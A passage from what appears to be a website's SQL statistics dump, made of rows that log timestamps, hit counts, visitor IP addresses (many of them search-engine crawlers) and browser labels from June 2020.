(510819,1591191502,1,1,0,0,'207.46.13.74','other'),(510820,1591192661,1,1,0,0,'91.196.178.173','chrome'),(510821,1591193235,1,1,0,0,'213.180.203.16','other'),(510822,1591193257,1,1,0,0,'91.196.178.86','chrome'),(510823,1591193366,1,1,0,0,'31.43.19.151','chrome'),(510824,1591193536,3,3,0,0,'207.46.13.100','other'),(510825,1591194292,1,1,0,0,'213.180.203.6','other'),(510826,1591194436,1,1,0,0,'91.196.177.147','chrome'),(510827,1591195174,8,8,0,0,'77.120.98.235','other'),(510828,1591195305,1,1,0,0,'207.46.13.100','other'),(510829,1591196068,1,1,0,0,'37.73.164.35','chrome'),(510830,1591196169,1,1,0,0,'207.46.13.209','other'),(510831,1591197240,1,1,0,0,'207.46.13.209','other'),(510832,1591197693,1,1,0,0,'157.245.47.0','chrome'),(510833,1591198198,1,1,0,0,'207.46.13.209','other'),(510834,1591198330,1,1,0,0,'207.46.13.100','other'),(510835,1591198477,1,1,0,0,'8.29.198.27','other'),(510836,1591198709,1,1,0,0,'8.29.198.25','other'),(510837,1591199336,8,8,0,0,'77.120.98.235','other'),(510838,1591199588,1,1,0,0,'176.105.196.28','chrome'),(510839,1591200386,2,2,0,0,'207.46.13.100','other'),(510840,1591201750,1,1,0,0,'207.46.13.74','other'),(510841,1591202864,1,1,0,0,'207.46.13.74','other'),(510842,1591203014,1,1,0,0,'207.46.13.209','other'),(510843,1591203940,8,8,0,0,'77.120.98.235','other'),(510844,1591203980,1,1,0,0,'207.46.13.209','other'),(510845,1591204346,1,1,0,0,'178.154.200.196','other'),(510846,1591205361,1,1,0,0,'91.196.178.21','chrome'),(510847,1591206055,1,1,0,0,'207.46.13.209','other'),(510848,1591206298,1,1,0,0,'209.17.96.2','other'),(510849,1591206923,1,1,0,0,'38.99.62.94','other'),(510850,1591207644,1,1,0,0,'91.196.178.161','chrome'),(510851,1591207786,1,1,0,0,'167.71.140.74','chrome'),(510852,1591208537,8,8,0,0,'77.120.98.235','other'),(510853,1591209308,2,2,0,0,'8.29.198.25','other'),(510854,1591212019,1,1,0,0,'94.153.16.120','chrome'),(510855,1591213348,8,8,0,0,'77.120.98.235','other'),(510856,1591214816,1,1,0,0,'66.249.70.69','chrome'),(510857,1591215015,1,1,0,0,'92.38.136.69','chrome'),(510858,1591216968,1,1,0,0,'192.186.190.137','chrome'),(510859,1591217548,2,2,0,0,'207.46.13.100','other'),(510860,1591218111,8,8,0,0,'77.120.98.235','other'),(510861,1591219611,1,1,0,0,'207.46.13.209','other'),(510862,1591220138,2,2,0,0,'8.29.198.25','other'),(510863,1591220206,2,2,0,0,'207.46.13.74','other'),(510864,1591221964,1,1,0,0,'157.55.39.240','other'),(510865,1591222481,1,1,0,0,'89.28.2.193','chrome'),(510866,1591222505,1,1,0,0,'66.249.70.72','chrome'),(510867,1591222868,8,8,0,0,'77.120.98.235','other'),(510868,1591223204,1,1,0,0,'91.196.178.6','chrome'),(510869,1591223563,1,1,0,0,'66.249.70.69','chrome'),(510870,1591224240,1,1,0,0,'207.46.13.209','other'),(510871,1591224962,1,1,0,0,'142.44.138.126','other'),(510872,1591225988,2,2,0,0,'207.46.13.74','other'),(510873,1591227557,1,1,0,0,'157.55.39.240','other'),(510874,1591227843,8,8,0,0,'77.120.98.235','other'),(510875,1591227899,1,1,0,0,'178.154.200.92','other'),(510876,1591228507,1,1,0,0,'62.205.134.182','other'),(510877,1591228646,1,1,0,0,'91.196.178.122','other'),(510878,1591229276,1,1,0,0,'207.46.13.209','other'),(510879,1591230805,1,1,0,0,'66.249.70.70','chrome'),(510880,1591230973,1,1,0,0,'8.29.198.26','other'),(510881,1591231192,1,1,0,0,'8.29.198.27','other'),(510882,1591231279,1,1,0,0,'207.46.13.74','other'),(510883,1591231789,1,1,0,0,'3.120.225.253','other'),(510884,1591232383,8,8,0,0,'77.120.98.235','other'),(510885,1591232657,1,1,0,0,'66.249.70.72','chrome'),(510886,1591234767,1,1,0,0,'157.55.39.240','other'),(510887,1591235608,1,1,0,0,'173.212.233.72','firefox'),(510888,1591236257,1,1,0,0,'157.55.39.240','other'),(510889,1591236927,1,1,0,0,'66.249.70.72','chrome'),(510890,1591237365,1,1,0,0,'157.55.39.240','other'),(510891,1591237641,8,8,0,0,'77.120.98.235','other'),(510892,1591240444,1,1,0,0,'207.46.13.209','other'),(510893,1591241801,2,2,0,0,'8.29.198.27','other'),(510894,1591241954,1,1,0,0,'109.162.120.195','chrome'),(510895,1591242832,1,1,0,0,'207.46.13.209','other'),(510896,1591242910,2,2,0,0,'109.162.120.195','chrome'),(510897,1591243783,2,2,0,0,'157.55.39.240','other'),(510898,1591244121,8,8,0,0,'77.120.98.235','other'),(510899,1591244420,1,1,0,0,'109.162.120.195','chrome'),(510900,1591246457,1,1,0,0,'62.205.134.182','other'),(510901,1591246774,1,1,0,0,'91.196.178.68','chrome'),(510902,1591247126,2,1,1,0,'66.249.70.70',''),(510903,1591248413,1,1,0,0,'207.46.13.74','other'),(510904,1591249026,1,1,0,0,'94.153.34.156','chrome'),(510905,1591249890,8,8,0,0,'77.120.98.235','other'),(510906,1591249984,1,1,0,0,'31.13.127.20','other'),(510907,1591249985,1,1,0,0,'31.13.127.111','other'),(510910,1591250133,2,2,0,0,'91.196.178.86','chrome'),(510911,1591250350,2,2,0,0,'207.46.13.209','other'),(510912,1591251083,1,1,0,0,'207.46.13.74','other'),(510913,1591252070,1,1,0,0,'24.87.144.10','chrome'),(510914,1591252073,1,1,0,0,'24.87.144.10','other'),(510915,1591252634,1,1,0,0,'8.29.198.26','other'),(510916,1591252835,1,1,0,0,'8.29.198.25','other'),(510917,1591252871,1,1,0,0,'157.55.39.240','other'),(510918,1591253730,1,1,0,0,'207.46.13.209','other'),(510919,1591254277,1,1,0,0,'188.163.73.133','chrome'),(510920,1591255358,1,1,0,0,'207.46.13.74','other'),(510921,1591255426,1,1,0,0,'131.220.6.152','chrome'),(510922,1591255437,1,1,0,0,'66.249.70.69','chrome'),(510923,1591255456,1,1,0,0,'207.46.13.209','other'),(510924,1591255877,2,2,0,0,'91.196.178.157','chrome'),(510925,1591255932,8,8,0,0,'77.120.98.235','other'),(510926,1591256009,1,0,1,0,'66.249.70.72',''),(510927,1591256164,1,1,0,0,'178.95.246.231','chrome'),(510928,1591257155,1,1,0,0,'195.211.173.40','chrome'),(510929,1591258176,1,1,0,0,'157.55.39.240','other'),(510930,1591258188,1,1,0,0,'17.58.99.7','other'),(510931,1591258594,1,1,0,0,'207.46.13.209','other'),(510932,1591259523,1,1,0,0,'66.249.70.70','chrome'),(510933,1591260276,2,2,0,0,'91.196.176.13','chrome'),(510934,1591260329,1,1,0,0,'91.196.178.94','chrome'),(510935,1591262197,1,1,0,0,'157.55.39.240','other'),(510936,1591262273,1,1,0,0,'178.159.37.88','chrome'),(510937,1591263171,1,1,0,0,'13.66.139.0','other'),(510938,1591263313,8,8,0,0,'77.120.98.235','other'),(510939,1591263414,1,1,0,0,'66.249.70.70','chrome'),(510940,1591263463,1,1,0,0,'3.22.60.180','chrome'),(510941,1591263467,2,2,0,0,'8.29.198.27','other'),(510942,1591264044,1,1,0,0,'37.53.90.175','chrome'),(510943,1591264098,1,1,0,0,'91.196.177.147','chrome'),(510944,1591264407,1,1,0,0,'194.61.24.94','other'),(510945,1591265624,2,2,0,0,'157.55.39.240','other'),(510946,1591266049,1,1,0,0,'91.196.178.171','chrome'),(510947,1591269260,1,1,0,0,'109.74.154.72','chrome'),(510948,1591270431,1,1,0,0,'91.196.177.147','chrome'),(510949,1591270971,1,1,0,0,'157.55.39.240','other'),(510950,1591271377,8,8,0,0,'77.120.98.235','other'),(510951,1591271622,1,1,0,0,'188.254.127.21','chrome'),(510952,1591271798,1,1,0,0,'17.58.99.7','other'),(510953,1591272158,1,1,0,0,'66.249.64.36','chrome'),(510954,1591272752,1,1,0,0,'66.249.70.70','chrome'),(510955,1591274301,1,1,0,0,'8.29.198.26','other'),(510956,1591274496,1,1,0,0,'8.29.198.25','other'),(510957,1591274624,1,1,0,0,'66.249.64.38','chrome'),(510958,1591275416,1,0,1,0,'66.249.70.70',''),(510959,1591275481,1,1,0,0,'92.113.188.245','chrome'),(510960,1591276132,1,1,0,0,'91.196.178.108','chrome'),(510961,1591276334,1,1,0,0,'91.196.178.86','chrome'),(510962,1591276423,2,2,0,0,'207.46.13.209','other'),(510963,1591276811,1,1,0,0,'37.53.89.92','chrome'),(510964,1591277155,1,1,0,0,'157.55.39.240','other'),(510965,1591277773,1,1,0,0,'91.196.178.86','chrome'),(510966,1591278203,1,1,0,0,'207.46.13.209','other'),(510967,1591278250,1,1,0,0,'66.249.64.33','chrome'),(510968,1591278764,1,1,0,0,'66.249.64.38','chrome'),(510969,1591278998,1,1,0,0,'91.196.178.86','chrome'),(510970,1591279388,1,0,1,0,'66.249.64.36',''),(510971,1591279579,8,8,0,0,'77.120.98.235','other'),(510972,1591280331,1,1,0,0,'157.55.39.240','other'),(510973,1591280454,1,1,0,0,'207.46.13.209','other'),(510974,1591281419,1,1,0,0,'207.46.13.209','other'),(510975,1591281796,1,1,0,0,'91.196.178.37','other'),(510976,1591282634,1,1,0,0,'66.249.70.72','chrome'),(510977,1591283016,1,1,0,0,'188.191.102.164','chrome'),(510978,1591283056,1,1,0,0,'17.58.99.7','other'),(510979,1591283167,2,2,0,0,'207.46.13.209','other'),(510980,1591283569,2,2,0,0,'46.211.74.162','chrome'),(510981,1591284275,1,1,0,0,'66.249.70.70','chrome'),(510982,1591284510,1,1,0,0,'46.211.74.162','chrome'),(510983,1591285059,1,1,0,0,'17.58.99.7','other'),(510984,1591285133,1,1,0,0,'8.29.198.26','other'),(510985,1591285348,1,1,0,0,'8.29.198.25','other'),(510986,1591287806,1,1,0,0,'66.249.70.69','chrome'),(510987,1591287969,1,1,0,0,'66.249.70.70','chrome'),(510988,1591288109,5,5,0,0,'18.232.38.214','other'),(510989,1591288891,8,8,0,0,'77.120.98.235','other'),(510990,1591288961,1,1,0,0,'207.46.13.209','other'),(510991,1591289019,4,4,0,0,'18.232.38.214','other'),(510992,1591290135,6,6,0,0,'18.232.38.214','other'),(510993,1591290659,1,1,0,0,'51.77.52.160','chrome'),(510994,1591290691,1,0,1,0,'66.249.70.69',''),(510995,1591291059,5,5,0,0,'18.232.38.214','other'),(510996,1591291097,2,2,0,0,'66.249.70.70','chrome'),(510997,1591291190,1,1,0,0,'178.154.200.222','chrome'),(510998,1591291318,1,1,0,0,'66.249.70.69','chrome'),(510999,1591291402,1,1,0,0,'178.154.200.220','other'),(511000,1591292008,4,4,0,0,'18.232.38.214','other'),(511001,1591292614,1,0,1,0,'66.249.70.70',''),(511002,1591292652,1,1,0,0,'66.249.64.36','chrome'),(511003,1591292814,4,4,0,0,'207.46.13.212','other'),(511004,1591292915,7,7,0,0,'18.232.38.214','other'),(511005,1591293386,1,1,0,0,'213.180.203.16','other'),(511006,1591293697,4,4,0,0,'207.46.13.209','other'),(511007,1591293897,2,2,0,0,'18.232.38.214','other'),(511008,1591294191,5,5,0,0,'157.55.39.240','other'),(511009,1591294259,2,2,0,0,'207.46.13.212','other'),(511010,1591294639,1,0,1,0,'66.249.70.72',''),(511011,1591294964,9,9,0,0,'18.232.38.214','other'),(511012,1591295157,1,1,0,0,'157.55.39.240','other'),(511013,1591295190,1,1,0,0,'207.46.13.212','other'),(511014,1591295732,1,1,0,0,'66.249.70.70','chrome'),(511015,1591295809,1,1,0,0,'66.249.64.36','chrome'),(511016,1591295813,1,1,0,0,'62.210.82.198','chrome'),(511017,1591295974,2,2,0,0,'8.29.198.27','other'),(511018,1591296029,6,6,0,0,'18.232.38.214','other'),(511019,1591296531,1,1,0,0,'66.249.70.72','chrome'),(511020,1591296740,1,1,0,0,'66.249.64.38','chrome'),(511021,1591296938,8,8,0,0,'18.232.38.214','other'),(511022,1591297191,1,1,0,0,'66.249.70.70','chrome'),(511023,1591297840,8,8,0,0,'77.120.98.235','other'),(511024,1591297879,1,1,0,0,'91.209.11.236','other'),(511025,1591298198,1,1,0,0,'66.249.70.72','chrome'),(511026,1591298678,1,1,0,0,'66.249.70.69','chrome'),(511027,1591298782,2,2,0,0,'217.97.55.109','chrome'),(511028,1591298793,1,1,0,0,'37.73.212.172','chrome'),(511029,1591298973,1,1,0,0,'207.46.13.209','other'),(511030,1591299929,1,1,0,0,'217.97.55.109','chrome'),(511031,1591299983,1,1,0,0,'157.55.39.240','other'),(511032,1591300038,1,1,0,0,'209.17.96.106','other'),(511033,1591300118,1,0,1,0,'66.249.70.70',''),(511034,1591300192,1,1,0,0,'207.46.13.209','other'),(511035,1591300205,3,3,0,0,'207.46.13.212','other'),(511036,1591300312,1,1,0,0,'213.180.203.65','other'),(511037,1591300357,1,1,0,0,'66.249.70.70','chrome'),(511038,1591300779,2,2,0,0,'66.249.70.69','chrome'),(511039,1591300962,1,1,0,0,'66.249.64.36','chrome'),(511040,1591300969,8,8,0,0,'77.120.98.235','other'),(511041,1591301169,2,2,0,0,'207.46.13.212','other'),(511042,1591301298,1,1,0,0,'217.97.55.109','chrome'),(511043,1591301338,3,3,0,0,'185.15.56.1','other'),(511044,1591301809,1,1,0,0,'70.88.133.182','firefox'),(511045,1591301917,1,1,0,0,'207.46.13.209','other'),(511046,1591301989,1,1,0,0,'66.249.70.72','chrome'),(511047,1591302635,1,1,0,0,'157.55.39.240','other'),(511048,1591302759,1,1,0,0,'207.46.13.212','other'),(511049,1591303377,8,8,0,0,'77.120.98.235','other'),(511050,1591303654,1,1,0,0,'157.55.39.240','other'),(511051,1591303762,1,1,0,0,'185.234.218.42','firefox'),(511052,1591303886,1,1,0,0,'207.46.13.12','other'),(511053,1591304101,3,3,0,0,'207.46.13.212','other'),(511054,1591305400,1,1,0,0,'207.46.13.209','other'),(511055,1591305623,8,8,0,0,'77.120.98.235','other'),(511056,1591305971,1,1,0,0,'66.249.70.72','chrome'),(511057,1591306274,1,1,0,0,'213.180.203.16','other'),(511058,1591306643,1,1,0,0,'66.249.64.36','chrome'),(511059,1591306810,1,1,0,0,'8.29.198.26','other'),(511060,1591307006,1,1,0,0,'8.29.198.25','other'),(511061,1591307818,8,8,0,0,'77.120.98.235','other'),(511062,1591308556,1,1,0,0,'213.180.203.142','other'),(511063,1591308841,3,3,0,0,'91.196.178.139','chrome'),(511064,1591309106,1,1,0,0,'213.180.203.16','other'),(511065,1591309386,1,1,0,0,'207.46.13.209','other'),(511066,1591309675,1,1,0,0,'66.249.70.72','chrome'),(511067,1591309812,1,1,0,0,'207.46.13.212','other'),(511068,1591310030,8,8,0,0,'77.120.98.235','other'),(511069,1591311064,1,1,0,0,'207.46.13.12','other'),(511070,1591311605,1,1,0,0,'207.46.13.209','other'),(511071,1591311933,1,1,0,0,'178.154.200.176','other'),(511072,1591311958,1,1,0,0,'178.154.200.105','other'),(511073,1591312215,8,8,0,0,'77.120.98.235','other'),(511074,1591313084,1,1,0,0,'178.154.200.196','other'),(511075,1591313446,1,1,0,0,'66.249.70.70','chrome'),(511076,1591313763,1,1,0,0,'137.220.34.35','msie'),(511077,1591313764,1,1,0,0,'139.180.130.64','msie'),(511078,1591313765,1,1,0,0,'139.180.134.234','msie'),(511079,1591314419,8,8,0,0,'77.120.98.235','other'),(511080,1591314491,1,0,1,0,'66.249.70.70',''),(511081,1591314907,1,1,0,0,'62.205.134.182','other'),(511082,1591316507,1,1,0,0,'157.55.39.240','other'),(511083,1591316595,8,8,0,0,'77.120.98.235','other'),(511084,1591317334,1,1,0,0,'91.209.11.236','other'),(511085,1591317648,1,1,0,0,'8.29.198.25','other'),(511086,1591317709,1,1,0,0,'66.249.70.70','chrome'),(511087,1591317823,1,1,0,0,'207.46.13.212','other'),(511088,1591317829,1,1,0,0,'8.29.198.26','other'),(511089,1591318150,1,1,0,0,'66.249.70.72','chrome'),(511090,1591318706,8,8,0,0,'77.120.98.235','other'),(511091,1591319196,1,1,0,0,'66.249.70.70','chrome'),(511092,1591320232,1,1,0,0,'66.249.70.70','chrome'),(511093,1591320704,8,8,0,0,'77.120.98.235','other'),(511094,1591320936,1,1,0,0,'207.46.13.209','other'),(511095,1591321999,1,1,0,0,'91.209.11.236','other'),(511096,1591322381,1,1,0,0,'66.249.70.70','chrome'),(511097,1591322824,8,8,0,0,'77.120.98.235','other'),(511098,1591323217,2,2,0,0,'207.46.13.212','other'),(511099,1591323466,1,1,0,0,'66.249.70.69','chrome'),(511100,1591323761,1,1,0,0,'178.154.200.220','other'),(511101,1591324819,2,2,0,0,'66.249.70.72','chrome'),(511102,1591324903,2,2,0,0,'207.46.13.209','other'),(511103,1591324944,8,8,0,0,'77.120.98.235','other'),(511104,1591325036,1,1,0,0,'178.154.200.97','other'),(511105,1591325337,1,1,0,0,'66.249.70.69','chrome'),(511106,1591325586,1,1,0,0,'207.46.13.212','other'),(511107,1591325855,1,1,0,0,'66.249.64.38','chrome'),(511108,1591325922,2,2,0,0,'66.249.70.72','chrome'),(511109,1591326114,1,1,0,0,'66.249.70.70','chrome'),(511110,1591326306,2,1,1,0,'66.249.70.69',''),(511111,1591326910,2,2,0,0,'207.46.13.212','other'),(511112,1591327023,1,1,0,0,'213.180.203.16','other'),(511113,1591327074,8,8,0,0,'77.120.98.235','other'),(511114,1591327515,1,1,0,0,'66.249.64.36','chrome'),(511115,1591327976,1,1,0,0,'66.249.64.38','chrome'),(511116,1591328483,1,1,0,0,'8.29.198.27','other'),(511117,1591328656,1,1,0,0,'8.29.198.25','other'),(511118,1591329105,8,8,0,0,'77.120.98.235','other'),(511119,1591329367,1,1,0,0,'66.249.70.72','chrome'),(511120,1591329540,1,1,0,0,'66.249.70.69','chrome'),(511121,1591331253,8,8,0,0,'77.120.98.235','other'),(511122,1591332550,1,1,0,0,'62.205.134.182','other'),(511123,1591333023,1,1,0,0,'66.249.70.72','chrome'),(511124,1591333515,8,8,0,0,'77.120.98.235','other'),(511125,1591333918,1,1,0,0,'207.46.13.209','other'),(511126,1591334146,1,1,0,0,'213.180.203.16','other'),(511127,1591334904,1,1,0,0,'66.249.70.72','chrome'),(511128,1591335094,1,1,0,0,'91.209.11.236','other'),(511129,1591335649,8,8,0,0,'77.120.98.235','other'),(511130,1591337044,1,1,0,0,'66.249.70.72','chrome'),(511131,1591337592,1,1,0,0,'66.249.64.38','chrome'),(511132,1591337775,8,8,0,0,'77.120.98.235','other'),(511133,1591338203,2,2,0,0,'46.211.73.127','chrome'),(511134,1591338254,1,1,0,0,'178.154.200.222','other'),(511135,1591338478,1,1,0,0,'213.159.213.137','other'),(511136,1591338714,1,1,0,0,'66.249.70.69','chrome'),(511137,1591339164,1,1,0,0,'66.249.70.72','chrome'),(511138,1591339177,1,1,0,0,'46.211.73.127','chrome'),(511139,1591339322,1,1,0,0,'8.29.198.27','other'),(511140,1591339330,1,1,0,0,'91.124.91.178','chrome'),(511141,1591339488,1,1,0,0,'8.29.198.26','other'),(511142,1591339974,8,8,0,0,'77.120.98.235','other'),(511143,1591340854,1,1,0,0,'66.249.64.38','chrome'),(511144,1591341344,1,1,0,0,'66.249.70.69','chrome'),(511145,1591342228,8,8,0,0,'77.120.98.235','other'),(511146,1591342248,2,2,0,0,'207.46.13.209','other'),(511147,1591343272,1,1,0,0,'66.249.70.69','chrome'),(511148,1591343808,1,1,0,0,'194.61.24.94','other'),(511149,1591344020,1,1,0,0,'66.249.64.38','chrome'),(511150,1591344304,1,1,0,0,'207.46.13.221','other'),(511151,1591344442,8,8,0,0,'77.120.98.235','other'),(511152,1591345155,1,0,1,0,'66.249.70.72',''),(511153,1591345820,1,1,0,0,'91.196.177.15','chrome'),(511154,1591346083,1,1,0,0,'66.249.70.70','chrome'),(511155,1591346304,1,1,0,0,'66.249.70.72','chrome'),(511156,1591346666,8,8,0,0,'77.120.98.235','other'),(511157,1591346670,1,1,0,0,'207.46.13.221','other'),(511158,1591347060,1,1,0,0,'46.211.2.87','chrome'),(511159,1591348253,1,1,0,0,'178.154.200.222','other'),(511160,1591348612,1,1,0,0,'157.55.39.52','other'),(511161,1591348615,1,1,0,0,'207.46.13.209','other'),(511162,1591348922,8,8,0,0,'77.120.98.235','other'),(511163,1591349640,3,3,0,0,'157.55.39.52','other'),(511164,1591349696,1,1,0,0,'18.188.128.181','chrome'),(511165,1591349854,1,1,0,0,'66.249.70.69','chrome'),(511166,1591350152,1,1,0,0,'107.167.81.66','chrome'),(511167,1591350157,1,1,0,0,'8.29.198.26','other'),(511168,1591350219,1,1,0,0,'66.249.64.38','chrome'),(511169,1591350315,1,1,0,0,'8.29.198.25','other'),(511170,1591350833,1,1,0,0,'66.249.70.70','chrome'),(511171,1591351194,8,8,0,0,'77.120.98.235','other'),(511172,1591351735,1,1,0,0,'66.249.70.70','chrome'),(511173,1591353366,1,1,0,0,'66.249.70.72','chrome'),(511174,1591353452,8,8,0,0,'77.120.98.235','other'),(511175,1591354748,1,1,0,0,'66.249.70.72','chrome'),(511176,1591354921,1,1,0,0,'157.55.39.52','other'),(511177,1591355587,1,1,0,0,'62.80.185.138','firefox'),(511178,1591355679,8,8,0,0,'77.120.98.235','other'),(511179,1591356632,1,1,0,0,'178.154.200.222','other'),(511180,1591356715,2,2,0,0,'66.249.70.69','chrome'),(511181,1591356777,1,1,0,0,'131.220.6.152','chrome'),(511182,1591356859,1,1,0,0,'66.249.70.72','chrome'),(511183,1591356992,1,1,0,0,'109.74.154.72','chrome'),(511184,1591357108,1,1,0,0,'91.196.178.68','chrome'),(511185,1591357377,1,1,0,0,'157.55.39.52','other'),(511186,1591357693,1,1,0,0,'207.46.13.209','other'),(511187,1591357982,8,8,0,0,'77.120.98.235','other'),(511188,1591358663,1,1,0,0,'66.249.70.72','chrome'),(511189,1591358808,1,1,0,0,'207.46.13.209','other'),(511190,1591359114,3,3,0,0,'157.55.39.52','other'),(511191,1591359248,1,1,0,0,'185.15.56.22','other'),(511192,1591359910,1,1,0,0,'207.46.13.209','other'),(511193,1591360147,1,1,0,0,'157.55.39.52','other'),(511194,1591360382,8,8,0,0,'77.120.98.235','other'),(511195,1591360394,2,2,0,0,'207.46.13.221','other'),(511196,1591360717,1,1,0,0,'66.249.64.38','chrome'),(511197,1591360985,1,1,0,0,'8.29.198.25','other'),(511198,1591361023,1,1,0,0,'66.249.64.33','chrome'),(511199,1591361140,1,1,0,0,'8.29.198.26','other'),(511200,1591361292,1,1,0,0,'66.249.70.72','chrome'),(511201,1591361340,1,1,0,0,'17.58.99.7','other'),(511202,1591361515,2,2,0,0,'91.196.177.15','chrome'),(511203,1591361751,3,3,0,0,'207.46.13.209','other'),(511204,1591361988,3,3,0,0,'207.46.13.221','other'),(511205,1591362325,1,1,0,0,'66.249.70.72','chrome'),(511206,1591362348,1,1,0,0,'66.249.70.70','chrome'),(511207,1591362424,1,1,0,0,'157.55.39.52','other'),(511208,1591362672,8,8,0,0,'77.120.98.235','other'),(511209,1591364197,1,1,0,0,'178.154.200.196','other'),(511210,1591364412,1,1,0,0,'207.46.13.209','other'),(511211,1591364858,8,8,0,0,'77.120.98.235','other'),(511212,1591365001,1,1,0,0,'213.180.203.23','other'),(511213,1591365181,1,1,0,0,'207.46.13.221','other'),(511214,1591365947,1,1,0,0,'157.55.39.52','other'),(511215,1591366391,2,2,0,0,'207.46.13.221','other'),(511216,1591366725,2,2,0,0,'66.249.70.70','chrome'),(511217,1591366904,1,1,0,0,'157.55.39.52','other'),(511218,1591367156,8,8,0,0,'77.120.98.235','other'),(511219,1591367896,1,1,0,0,'207.46.13.221','other'),(511220,1591369078,1,1,0,0,'207.46.13.209','other'),(511221,1591369382,8,8,0,0,'77.120.98.235','other'),(511222,1591369517,1,1,0,0,'66.249.64.33','chrome'),(511223,1591369594,1,1,0,0,'66.249.64.36','chrome'),(511224,1591369634,1,1,0,0,'157.55.39.52','other'),(511225,1591369698,1,1,0,0,'88.99.2.203','other'),(511226,1591369701,6,6,0,0,'136.243.70.68','other'),(511227,1591370848,2,2,0,0,'157.55.39.52','other'),(511228,1591371052,1,1,0,0,'207.46.13.221','other'),(511229,1591371675,8,8,0,0,'77.120.98.235','other'),(511230,1591371761,1,1,0,0,'157.55.39.52','other'),(511231,1591371825,1,1,0,0,'8.29.198.27','other'),(511232,1591371975,1,1,0,0,'8.29.198.26','other'),(511233,1591372334,2,2,0,0,'207.46.13.209','other'),(511234,1591372861,1,1,0,0,'157.55.39.52','other'),(511235,1591372972,1,1,0,0,'66.249.70.72','chrome'),(511236,1591373269,1,1,0,0,'66.249.64.33','chrome'),(511237,1591373367,1,1,0,0,'178.154.200.245','other'),(511238,1591373413,1,1,0,0,'66.249.64.36','chrome'),(511239,1591374051,8,8,0,0,'77.120.98.235','other'),(511240,1591376234,1,1,0,0,'66.249.70.70','chrome'),(511241,1591376362,8,8,0,0,'77.120.98.235','other'),(511242,1591376791,1,1,0,0,'66.249.64.36','chrome'),(511243,1591377172,1,1,0,0,'213.180.203.16','other'),(511244,1591377514,2,2,0,0,'157.55.39.52','other'),(511245,1591377532,1,1,0,0,'207.46.13.209','other'),(511246,1591378173,3,3,0,0,'66.249.70.72','chrome'),(511247,1591378695,1,1,0,0,'93.159.230.28','chrome'),(511248,1591378700,8,8,0,0,'77.120.98.235','other'),(511249,1591379068,1,1,0,0,'207.46.13.221','other'),(511250,1591379197,1,1,0,0,'66.249.70.72','chrome'),(511251,1591379246,1,1,0,0,'157.55.39.52','other'),(511252,1591379935,6,6,0,0,'34.232.62.209','other'),(511253,1591380091,1,1,0,0,'104.214.37.139','chrome'),(511254,1591380352,1,1,0,0,'207.46.13.221','other'),(511255,1591380848,1,0,1,0,'66.249.70.69',''),(511256,1591380874,6,6,0,0,'34.232.62.209','other'),(511257,1591380915,1,0,1,0,'66.249.70.70',''),(511258,1591381193,1,0,1,0,'66.249.70.72',''),(511259,1591381212,1,1,0,0,'178.154.200.222','other'),(511260,1591381307,8,8,0,0,'77.120.98.235','other'),(511261,1591381707,2,2,0,0,'207.46.13.209','other'),(511262,1591381773,1,1,0,0,'154.51.131.142','chrome'),(511263,1591381954,4,4,0,0,'34.232.62.209','other'),(511264,1591382134,1,1,0,0,'66.249.70.69','chrome'),(511265,1591382143,1,1,0,0,'66.249.64.38','chrome'),(511266,1591382380,1,1,0,0,'31.163.240.161','chrome'),(511267,1591382661,2,2,0,0,'8.29.198.27','other'),(511268,1591382816,2,2,0,0,'157.55.39.52','other'),(511269,1591382953,6,6,0,0,'34.232.62.209','other'),(511270,1591383429,1,0,1,0,'66.249.70.72',''),(511271,1591383540,3,3,0,0,'207.46.13.209','other'),(511272,1591383672,8,8,0,0,'77.120.98.235','other'),(511273,1591383870,5,5,0,0,'34.232.62.209','other'),(511274,1591384839,8,8,0,0,'34.232.62.209','other'),(511275,1591385465,1,1,0,0,'91.196.178.21','chrome'),(511276,1591385768,6,6,0,0,'34.232.62.209','other'),(511277,1591386026,8,8,0,0,'77.120.98.235','other'),(511278,1591386043,1,1,0,0,'88.155.40.42','chrome'),(511279,1591386250,1,1,0,0,'68.183.154.148','other'),(511280,1591386401,2,2,0,0,'207.46.13.85','other'),(511281,1591386692,10,10,0,0,'34.232.62.209','other'),(511282,1591387003,2,2,0,0,'93.170.117.34','other'),(511283,1591387382,1,1,0,0,'66.249.64.38','chrome'),(511284,1591387527,1,1,0,0,'207.46.13.221','other'),(511285,1591387683,5,5,0,0,'34.232.62.209','other'),(511286,1591388369,3,3,0,0,'157.55.39.52','other'),(511287,1591388371,8,8,0,0,'77.120.98.235','other'),(511288,1591389446,1,1,0,0,'66.249.70.70','chrome'),(511289,1591389532,1,1,0,0,'66.249.70.72','chrome'),(511290,1591390070,2,2,0,0,'207.46.13.221','other'),(511291,1591390721,8,8,0,0,'77.120.98.235','other'),(511292,1591391252,1,1,0,0,'46.243.145.131','firefox'),(511293,1591392131,3,3,0,0,'157.55.39.52','other'),(511294,1591392545,1,1,0,0,'134.209.42.69','other'),(511295,1591392791,1,1,0,0,'157.55.39.248','other'),(511296,1591393053,8,8,0,0,'77.120.98.235','other'),(511297,1591393132,1,1,0,0,'17.58.99.7','other'),(511298,1591393492,1,1,0,0,'8.29.198.25','other'),(511299,1591393555,1,1,0,0,'157.55.39.52','other'),(511300,1591393627,1,1,0,0,'8.29.198.27','other'),(511301,1591393975,1,0,1,0,'66.249.70.69',''),(511302,1591394062,1,1,0,0,'17.58.99.7','other'),(511303,1591395414,8,8,0,0,'77.120.98.235','other'),(511304,1591395567,3,3,0,0,'157.55.39.248','other'),(511305,1591396497,1,1,0,0,'207.46.13.221','other'),(511306,1591396874,1,1,0,0,'66.249.70.69','chrome'),(511307,1591396892,1,1,0,0,'66.249.64.33','chrome'),(511308,1591397374,1,1,0,0,'183.136.225.46','firefox'),(511309,1591397398,3,3,0,0,'157.55.39.52','other'),(511310,1591397555,4,4,0,0,'207.46.13.85','other'),(511311,1591397621,2,2,0,0,'5.9.70.117','other'),(511312,1591397864,8,8,0,0,'77.120.98.235','other'),(511313,1591398139,1,1,0,0,'66.249.70.72','chrome'),(511314,1591398599,1,1,0,0,'207.46.13.221','other'),(511315,1591398715,2,2,0,0,'157.55.39.52','other'),(511316,1591400269,2,2,0,0,'157.55.39.248','other'),(511317,1591400300,8,8,0,0,'77.120.98.235','other'),(511318,1591400978,1,1,0,0,'157.55.39.52','other'),(511319,1591401306,1,1,0,0,'62.205.134.182','other'),(511320,1591401346,2,2,0,0,'157.55.39.248','other'),(511321,1591401968,1,1,0,0,'66.249.70.69','chrome'),(511322,1591402496,1,1,0,0,'66.249.70.72','chrome'),(511323,1591402711,8,8,0,0,'77.120.98.235','other'),(511324,1591404333,1,1,0,0,'8.29.198.26','other'),(511325,1591404452,1,1,0,0,'8.29.198.27','other'),(511326,1591405124,8,8,0,0,'77.